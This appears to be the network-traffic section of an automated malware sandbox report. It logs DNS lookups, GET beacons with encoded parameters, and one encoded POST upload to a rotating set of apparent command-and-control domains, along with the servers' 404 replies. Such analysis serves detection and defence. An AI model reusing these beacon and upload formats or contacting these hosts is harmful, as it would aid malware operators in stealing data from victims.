            Source: global trafficHTTP traffic detected: GET /8pln/?vf5pwn=T9/DtY4QstE2hf5N+QbDCp08BY0+/KIvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9qM2494p5Ur94ranWdRPLWWfdK4ZvNUpqMUToNubzG0SM8g==&lHul=nfQTqL40vDEpIp30 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.ultraleap.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /v2c3/?lHul=nfQTqL40vDEpIp30&vf5pwn=4KW7rJi8xQgG5JuhUUy4oHXtvgFnSuEzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxet5jRO5AJzixTprPi8JCHFDrvphN2mQYrYWI0Ljg/1k5GCA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dalong.siteConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xamn/?vf5pwn=eI40u+kXl6dCNOxtOqaVh3t2St2MUXLKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR4W4fWnAv/fqpdm4W58wxIsvJOF8/cGdHH0QztCYqDUNhvQ==&lHul=nfQTqL40vDEpIp30 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mgeducacaopro.onlineConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /fava/?lHul=nfQTqL40vDEpIp30&vf5pwn=GCDZpLqdSYk7fT5BaAxVCvWfN8QL3LUdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQAngPiIKVJBW1l0NVsB5cz1lTXdEnKbnDfocvymGyGvQBrQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.heldhold.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /5o7d/?vf5pwn=zMeRclQqEZ6cHEkv6r3h6rNdPeIv0NfXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGdsHlq0LOSSwDS14egmHnY5/1aPOe4+/4uS5IVfZSCCmkbAw==&lHul=nfQTqL40vDEpIp30 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.63582.photoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kt2f/?vf5pwn=3qIRfQl/AKdo1myXluGCiikgEIMzjkfYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfHO+i2Ne6X81cG7kNzDpu31X3NSjbrBV+9ESn2I73xzu4qQ==&lHul=nfQTqL40vDEpIp30 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.asiapartnars.onlineConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /al6z/?lHul=nfQTqL40vDEpIp30&vf5pwn=VRCNh0NW0GgzXjJ+E9kBcAqzCeGDRYuLK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cpu7tsWuW3JQaVwptT6evyL2oGhO/bgF+68v7eWhteCSlc6A== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.linkwave.cloudConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3lu7/?vf5pwn=nzWofdhWpyQTuQkAURoZiOuSpDDcsuZ4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCJcPncARSRGAtt0+HcJ3GcQEnXiNUfFJGdHJ4JUWSbdHV9w==&lHul=nfQTqL40vDEpIp30 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mfgarage.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.2bhp.com
            Source: global trafficDNS traffic detected: DNS query: www.ultraleap.net
            Source: global trafficDNS traffic detected: DNS query: www.dalong.site
            Source: global trafficDNS traffic detected: DNS query: www.mgeducacaopro.online
            Source: global trafficDNS traffic detected: DNS query: www.heldhold.xyz
            Source: global trafficDNS traffic detected: DNS query: www.63582.photo
            Source: global trafficDNS traffic detected: DNS query: www.useanecdotenow.tech
            Source: global trafficDNS traffic detected: DNS query: www.asiapartnars.online
            Source: global trafficDNS traffic detected: DNS query: www.linkwave.cloud
            Source: global trafficDNS traffic detected: DNS query: www.mfgarage.net
            Source: global trafficDNS traffic detected: DNS query: www.b5x7vk.agency
            Source: unknownHTTP traffic detected: POST /8pln/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.ultraleap.netOrigin: http://www.ultraleap.netContent-Length: 207Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.ultraleap.net/8pln/User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36Data Raw: 76 66 35 70 77 6e 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 34 36 70 41 31 52 66 4e 51 72 73 6b 61 4b 4d 33 35 76 51 7a 47 57 52 74 63 31 66 38 33 30 62 31 4a 32 38 54 46 74 63 79 2b 44 4e 50 4c 41 73 55 63 6f 4e 74 50 70 6e 76 58 68 6d 33 72 38 48 6b 4b 75 77 70 76 39 69 48 6f 37 6a 45 77 70 42 4e 61 49 78 51 76 36 4f 4b 59 53 36 7a 5a 32 50 51 61 72 4d 72 4d 43 34 36 48 6b 76 6b 49 63 47 36 46 6e 6e 43 68 55 32 55 4c 69 43 57 57 52 4a 79 36 78 45 50 35 46 42 39 4b 76 44 46 72 55 6d 70 2b 51 72 33 6a 4d 66 38 65 42 46 34 4c 75 4c 65 52 6b 6f 73 31 75 4a 4b 65 37 72 63 49 42 2f 4e 63 6e 4d 55 43 79 56 65 59 41 73 3d Data Ascii: vf5pwn=e/XjuvFYh54w46pA1RfNQrskaKM35vQzGWRtc1f830b1J28TFtcy+DNPLAsUcoNtPpnvXhm3r8HkKuwpv9iHo7jEwpBNaIxQv6OKYS6zZ2PQarMrMC46HkvkIcG6FnnChU2ULiCWWRJy6xEP5FB9KvDFrUmp+Qr3jMf8eBF4LuLeRkos1uJKe7rcIB/NcnMUCyVeYAs=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:22:25 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 34 61 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 26 Sep 2024 13:22:54 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 26 Sep 2024 13:22:57 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 26 Sep 2024 13:23:00 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 26 Sep 2024 13:23:02 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 26 Sep 2024 13:23:22 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 